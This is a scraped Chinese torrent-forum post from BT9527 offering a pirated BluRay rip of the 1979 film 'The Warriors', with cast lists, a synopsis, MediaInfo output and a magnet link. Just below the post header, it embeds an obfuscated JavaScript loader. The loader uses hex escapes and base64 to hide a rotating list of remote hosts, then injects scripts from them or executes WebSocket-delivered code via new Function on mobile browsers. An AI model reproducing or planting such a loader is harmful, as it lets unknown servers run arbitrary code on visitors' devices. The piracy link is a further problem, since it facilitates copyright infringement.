战士帮[中文字幕]The.Warriors.1979.1080p.BluRay.DTS.x265-10bit-迅雷下载 8.50GB

版主小s 5天前 157

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译  名 战士帮 / 杀神挽歌(台) / 战士联盟帮
◎片  名 The Warriors
◎年  代 1979
◎产  地 美国
◎类  别 动作 / 惊悚 / 犯罪 / 冒险
◎语  言 英语
◎上映日期 1979-02-09
◎IMDb链接 https://www.imdb.com/title/tt0080120/
◎豆瓣评分 7.2/10 (973人评价)
◎豆瓣链接 https://movie.douban.com/subject/1300938/
◎片  长 92 分钟
◎导  演 沃尔特·希尔 Walter Hill (id:1014030)
◎编  剧 沃尔特·希尔 Walter Hill (id:1014030)
◎演  员 迈克尔·贝克 Michael Beck (id:1062310)
       詹姆斯·瑞马尔 James Remar (id:1013812)
       大卫·哈里斯 David Harris (id:1092700)
       马塞利诺·桑切斯 Marcelino Sánchez (id:1153097)
       Charles Serrano Charles Serrano (id:1141742)
       Terry Michos Terry Michos (id:1119206)
       Apache Ramos Apache Ramos (id:1145741)
       查尔斯·西尔文 Charles Silvern (id:1146931)
       戴布拉·范·沃尔肯布劳 Deborah Van Valkenburgh (id:1159621)
       林恩·瑟格本 Lynne Thigpen (id:1159756)
       托马斯沃特斯 Thomas G. Waites (id:1161183)
       John Snyder John Snyder (id:1350585)
       Harold Miller Harold Miller (id:1118584)
       欧文·凯斯 Irwin Keyes (id:1111509)
       大卫·帕特里克·凯利 David Patrick Kelly (id:1105073)
       罗伯特·汤森德 Robert Townsend (id:1007098)
       Charles Zucker Charles Zucker (id:1019476)
       克雷格·R·巴克斯利 Craig R. Baxley (id:1028046)
       梅塞迪丝·鲁尔 Mercedes Ruehl (id:1032042)
       Doran Clark Doran Clark (id:1073213)
       Gerald G. Francis Gerald G. Francis (id:1083596)
       保罗·格雷科 Paul Greco (id:1096833)
       John Gibson John Gibson (id:1099335)
       Dennis Gregory Dennis Gregory (id:1100219)
       Tommy J. Huff Tommy J. Huff (id:1102735)
       史蒂夫·詹姆斯 Steve James (id:1103291)
       索尼·兰哈姆 Sonny Landham (id:1007057)
       劳伦斯·戈登 Lawrence Gordon (id:1000700)
       劳伦·布罗泽 Laurent Bouzereau (id:1279090)
       弗兰克·马歇尔 Frank Marshall (id:1049939)
       乔·西尔沃 Joel Silver (id:1010670)
       沃尔特·希尔 Walter Hill (id:1014030)
       Freeman A. Davies Freeman A. Davies (id:1281880)
       巴里·德·沃尔宗 Barry De Vorzon (id:1023483)
       Andrew Laszlo Andrew Laszlo (id:1014841)
       苏珊·E·莫尔斯 Susan E. Morse (id:1292568)
       比利·韦伯 Billy Weber (id:1300592)
       Freeman A. Davies Freeman A. Davies (id:1281880)
       霍华德·弗尤尔 Howard Feuer (id:1082153)
       David Sosna David Sosna (id:1298082)

◎标  签 美国 / 黑帮 / 犯罪 / 美国电影 / cult / 1979 / 70年代 / 动作

◎简  介
  遍布纽约全城的数百帮派在这个夜里集体出动,为了响应纽约地下王者塞勒斯的号召,每支帮派派出九名不携带武器的成员参加塞勒斯的帮派大会。塞勒斯慷慨陈词,要求所有帮派遵守停战协议,将矛头一致对准警察,然而在演讲当中,塞勒斯中枪身亡,来自科尼岛的“战士帮”成员目击凶手,反被对方诬陷,混乱的人流里,战士帮匆匆逃出场地。帮派大会随即发出信息,要求各处的帮派截击返回科尼岛的战士帮。这边厢,因老大克里昂失踪,斯旺(Michael Beck 饰)带领其他七人应对这凶险的一夜,他们将面临其他帮派与警察的双重堵截,为了能回到自己的地盘,只能靠自己打出一条通路……

  1. General
  2. Unique ID                                : 25906237924005813324986311217342672170 (0x137D5C24CB2B9ACC681C05E235616D2A)
  3. Complete name                            : [email protected]kv
  4. Format                                   : Matroska
  5. Format version                           : Version 4
  6. File size                                : 8.50 GiB
  7. Duration                                 : 1 h 32 min
  8. Overall bit rate                         : 13.1 Mb/s
  9. Movie name                               : The Warriors 1979 1080p BluRay DTS [email protected]
  10. Encoded date                             : UTC 2021-07-22 00:06:57
  11. Writing application                      : mkvmerge v38.0.0 ('The Silent Type') 64-bit
  12. Writing library                          : libebml v1.3.9 + libmatroska v1.5.2
  13. Video
  14. ID                                       : 1
  15. Format                                   : HEVC
  16. Format/Info                              : High Efficiency Video Coding
  17. Format profile                           : Main [email protected]@High
  18. Codec ID                                 : V_MPEGH/ISO/HEVC
  19. Duration                                 : 1 h 32 min
  20. Bit rate                                 : 11.6 Mb/s
  21. Width                                    : 1 920 pixels
  22. Height                                   : 1 080 pixels
  23. Display aspect ratio                     : 16:9
  24. Frame rate mode                          : Constant
  25. Frame rate                               : 23.976 (24000/1001/53354) FPS
  26. Color space                              : YUV
  27. Chroma subsampling                       : 4:2:0
  28. Bit depth                                : 10 bits
  29. Bits/(Pixel*Frame)                       : 0.233
  30. Stream size                              : 7.51 GiB (88%)
  31. Title                                    : [email protected]
  32. Writing library                          : x265 - H.265/HEVC codec
  33. Default                                  : Yes
  34. Forced                                   : No
  35. Audio
  36. ID                                       : 2
  37. Format                                   : DTS
  38. Format/Info                              : Digital Theater Systems
  39. Codec ID                                 : A_DTS
  40. Duration                                 : 1 h 32 min
  41. Bit rate mode                            : Constant
  42. Bit rate                                 : 1 509 kb/s
  43. Channel(s)                               : 6 channels
  44. Channel layout                           : C L R Ls Rs LFE
  45. Sampling rate                            : 48.0 kHz
  46. Frame rate                               : 93.750 FPS (512 SPF)
  47. Bit depth                                : 24 bits
  48. Compression mode                         : Lossy
  49. Stream size                              : 1 003 MiB (12%)
  50. Title                                    : English
  51. Language                                 : English
  52. Default                                  : Yes
  53. Forced                                   : No
  54. Text #1
  55. ID                                       : 3
  56. Format                                   : PGS
  57. Muxing mode                              : zlib
  58. Codec ID                                 : S_HDMV/PGS
  59. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  60. Duration                                 : 1 h 29 min
  61. Bit rate                                 : 18.9 kb/s
  62. Count of elements                        : 1216
  63. Stream size                              : 12.0 MiB (0%)
  64. Title                                    : CHS
  65. Language                                 : Chinese
  66. Default                                  : Yes
  67. Forced                                   : No
  68. Text #2
  69. ID                                       : 4
  70. Format                                   : PGS
  71. Muxing mode                              : zlib
  72. Codec ID                                 : S_HDMV/PGS
  73. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  74. Duration                                 : 1 h 29 min
  75. Bit rate                                 : 19.2 kb/s
  76. Count of elements                        : 1216
  77. Stream size                              : 12.3 MiB (0%)
  78. Title                                    : CHT
  79. Language                                 : Chinese
  80. Default                                  : No
  81. Forced                                   : No
  82. Menu
  83. 00:00:00.000                             : en:Chapter 01
  84. 00:06:51.411                             : en:Chapter 02
  85. 00:16:01.961                             : en:Chapter 03
  86. 00:23:50.429                             : en:Chapter 04
  87. 00:28:54.733                             : en:Chapter 05
  88. 00:39:50.388                             : en:Chapter 06
  89. 00:46:37.795                             : en:Chapter 07
  90. 00:55:51.348                             : en:Chapter 08
  91. 01:01:58.715                             : en:Chapter 09
  92. 01:09:07.143                             : en:Chapter 10
  93. 01:16:48.604                             : en:Chapter 11
  94. 01:23:31.006                             : en:Chapter 12




TAGS 动作 冒险 惊悚 犯罪

磁力链:
  • magnet:?xt=urn:btih:0440E0CDF12CCC1EEA7581137A564CB8525E650A
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回